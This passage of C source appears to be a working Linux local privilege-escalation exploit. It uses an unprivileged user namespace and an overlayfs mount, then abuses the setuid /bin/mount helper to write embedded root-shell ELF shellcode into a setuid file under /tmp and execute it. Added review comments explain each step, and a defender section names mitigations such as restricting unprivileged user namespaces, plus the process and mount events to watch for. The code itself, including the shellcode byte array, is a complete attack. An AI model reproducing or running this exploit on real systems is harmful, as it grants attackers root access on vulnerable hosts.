// Poll /proc/<parent pid> every 100 microseconds.
  while(1) {
    usleep(100);
    result=stat(checkPath, &statBuf);

    if(result) {
      fprintf(stderr, "Namespacer helper: parent terminated\n");
      break;
    }
// Wait until parent has escalated.
// NOTE(review): the loop ends once the owner uid of /proc/<ppid> reads as
// non-zero; presumably that is how the parent's change of identity looks
// from inside this namespace - confirm.
    if(statBuf.st_uid) break;
  }

// Cleanup: leave the mount point, unmount, and delete the working files.
// None of these return values is checked.
  chdir("/");
  umount("/tmp/x/bin");
  unlink("/tmp/x/over/su");
  rmdir("/tmp/x/over");
  rmdir("/tmp/x/bin/work");
  rmdir("/tmp/x/bin");
  rmdir("/tmp/x/");
  fprintf(stderr, "Namespace part completed\n");

  return(0);
}


// 1 MiB static buffer used as the stack of the clone() child. main() passes
// child_stack+STACK_SIZE, i.e. the end of the buffer, to clone().
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];

/** Program entry point.
 *
 *  Usage (from the file header): UserNamespaceOverlayfsSetuidWriteExec -- [program] [args]
 *
 *  Outline of what the code below does:
 *   1. Parse arguments up to "--".
 *   2. Create /tmp/x, /tmp/x/bin and /tmp/x/over.
 *   3. clone() childFunc into a new user and mount namespace and write
 *      its setgroups, uid_map and gid_map files under /proc/<pid>.
 *   4. Wait for /tmp/x/over/su to exist, then fill /proc/<pid>/cwd/su
 *      with the bytes of suidExecMinimalElf, using the output of the
 *      helper binary (/bin/mount) rather than writing the data itself.
 *   5. execve() the resulting file.
 *
 *  Returns 1 on every failure path; on success the process image is
 *  replaced by execve() and this function does not return.
 *
 *  Review notes for defenders:
 *   - The visible preconditions are that an unprivileged user may create a
 *     user namespace and mount overlayfs inside it. Besides installing a
 *     fixed kernel, restricting unprivileged user namespaces (for example
 *     user.max_user_namespaces, or kernel.unprivileged_userns_clone on
 *     distributions that carry it) removes that precondition.
 *   - Observable events: clone() with CLONE_NEWUSER by a non-root user,
 *     an overlayfs mount with lowerdir=/bin, repeated short-lived
 *     /bin/mount processes whose stdout/stderr point at a regular file,
 *     and a setuid file appearing under /tmp.
 */
int main(int argc, char *argv[]) {
  int argPos;
  int result;
// targetSuidPath is declared but not used anywhere in this function.
  char *targetSuidPath="/bin/su";
  char *helperSuidPath="/bin/mount";

// Option parsing: "--" ends the options (and is skipped), the first
// argument not starting with "--" also ends them, and any other "--..."
// argument is rejected with exit status 1.
  for(argPos=1; argPos<argc; argPos++) {
    char *argName=argv[argPos];
    if(!strcmp(argName, "--")) {
      argPos++;
      break;
    }
    if(strncmp(argName, "--", 2)) {
      break;
    }

    fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName);
    exit(1);
  }

// Working directories, mode 0700. Return values are not checked, so an
// already existing /tmp/x is silently reused.
  mkdir("/tmp/x", 0700);
  mkdir("/tmp/x/bin", 0700);
  mkdir("/tmp/x/over", 0700);

// Create child; child commences execution in childFunc()
// CLONE_NEWNS: new mount namespace
// CLONE_NEWPID
// CLONE_NEWUTS
// Only CLONE_NEWUSER and CLONE_NEWNS are actually passed below; the two
// flags named above without explanation are not used.
  pid_t pid=clone(childFunc, child_stack+STACK_SIZE,
      CLONE_NEWUSER|CLONE_NEWNS|SIGCHLD, argv+argPos);
  if(pid==-1) {
    fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno));
    return(1);
  }

// Both buffers are reused for several paths and payloads further down.
  char idMapFileName[128];
  char idMapData[128];

// Write "deny" to the child's setgroups file; the kernel requires this
// before an unprivileged process may write gid_map.
  sprintf(idMapFileName, "/proc/%d/setgroups", pid);
  int setGroupsFd=open(idMapFileName, O_WRONLY);
  if(setGroupsFd<0) {
    fprintf(stderr, "Failed to open setgroups\n");
    return(1);
  }
  result=write(setGroupsFd, "deny", 4);
  if(result<0) {
    fprintf(stderr, "Failed to disable setgroups\n");
    return(1);
  }
  close(setGroupsFd);

// uid_map line "0 <uid> 1": uid 0 inside the namespace corresponds to the
// caller's own uid outside, for a range of one id.
  sprintf(idMapFileName, "/proc/%d/uid_map", pid);
  fprintf(stderr, "Setting uid map in %s\n", idMapFileName);
  int uidMapFd=open(idMapFileName, O_WRONLY);
  if(uidMapFd<0) {
    fprintf(stderr, "Failed to open uid map\n");
    return(1);
  }
  sprintf(idMapData, "0 %d 1\n", getuid());
  result=write(uidMapFd, idMapData, strlen(idMapData));
  if(result<0) {
    fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno));
    return(1);
  }
  close(uidMapFd);

// Same mapping for the group id.
  sprintf(idMapFileName, "/proc/%d/gid_map", pid);
  fprintf(stderr, "Setting gid map in %s\n", idMapFileName);
  int gidMapFd=open(idMapFileName, O_WRONLY);
  if(gidMapFd<0) {
    fprintf(stderr, "Failed to open gid map\n");
    return(1);
  }
  sprintf(idMapData, "0 %d 1\n", getgid());
  result=write(gidMapFd, idMapData, strlen(idMapData));
  if(result<0) {
    fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno));
    return(1);
  }
  close(gidMapFd);

// Wait until /tmp/x/over/su exists
// (polled every 100 microseconds, with no timeout).
  struct stat statBuf;
  while(1) {
    usleep(100);
    result=stat("/tmp/x/over/su", &statBuf);
    if(!result) break;
  }

// Overwrite the file
// The path goes through the child's working directory, which childFunc
// sets to /tmp/x/bin.
  sprintf(idMapFileName, "/proc/%d/cwd/su", pid);

// No slashes allowed, everything else is OK.
// The array starts with the ELF magic (0x7f 'E' 'L' 'F'); its contents are
// emitted below one run of non-zero bytes at a time.
  char suidExecMinimalElf[] = {
      0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
      0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
      0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
      0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
      0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
      0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
      0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
      0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80, 

      0x31, 0xc0, 0x04, 0xd0, 0xcd, 0x80,

      0x31, 0xc0, 0x89, 0xd0,
      0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
  };
  char *helperArgs[]={"/bin/mount", NULL};

// One descriptor is opened here and shared with every helper process.
  int destFd=open(idMapFileName, O_RDWR|O_CREAT|O_TRUNC, 07777);
  if(destFd<0) {
    fprintf(stderr, "Failed to open %s, error %s\n", idMapFileName, strerror(errno));
    return(1);
  }

// Walk the array as alternating runs of zero and non-zero bytes.
  char *suidWriteNext=suidExecMinimalElf;
  char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf);
  while(suidWriteNext!=suidWriteEnd) {
    char *suidWriteTestPos=suidWriteNext;
    while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
      suidWriteTestPos++;
// We cannot write any 0-bytes. So let seek fill up the file with
// null-bytes for us.
    lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET);
    suidWriteNext=suidWriteTestPos;
    while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
      suidWriteTestPos++;

// One helper process per non-zero run; the parent waits for each.
    pid_t helperPid=fork();
    if(!helperPid) {
      struct rlimit limits;

// We can't truncate, that would remove the setgid property of
// the file. So make sure the SUID binary does not write too much.
// (RLIMIT_FSIZE is set to the file offset where this run ends.)
      limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf;
      limits.rlim_max=limits.rlim_cur;
      setrlimit(RLIMIT_FSIZE, &limits);

// Do not rely on some SUID binary to print out the unmodified
// program name, some OSes might have hardening against that.
// Let the ld-loader do that for us.
// (The address space is capped at 1<<22 bytes; the result is stored but
// not checked.)
      limits.rlim_cur=1<<22;
      limits.rlim_max=limits.rlim_cur;
      result=setrlimit(RLIMIT_AS, &limits);

// stdout and stderr of the helper are the destination file, and its
// argv[0] is the current run of bytes.
      dup2(destFd, 1);
      dup2(destFd, 2);
      helperArgs[0]=suidWriteNext;
      execve(helperSuidPath, helperArgs, NULL);
      fprintf(stderr, "Exec failed\n");
      return(1);
    }
    waitpid(helperPid, NULL, 0);
    suidWriteNext=suidWriteTestPos;
  }
  close(destFd);
// Run the rewritten file with the remaining command-line arguments and an
// empty environment; reaching the lines after execve() means it failed.
  execve(idMapFileName, argv+argPos-1, NULL);
  fprintf(stderr, "Failed to execute %s: %d (%s)\n", idMapFileName,
      errno, strerror(errno));
  return(1);
}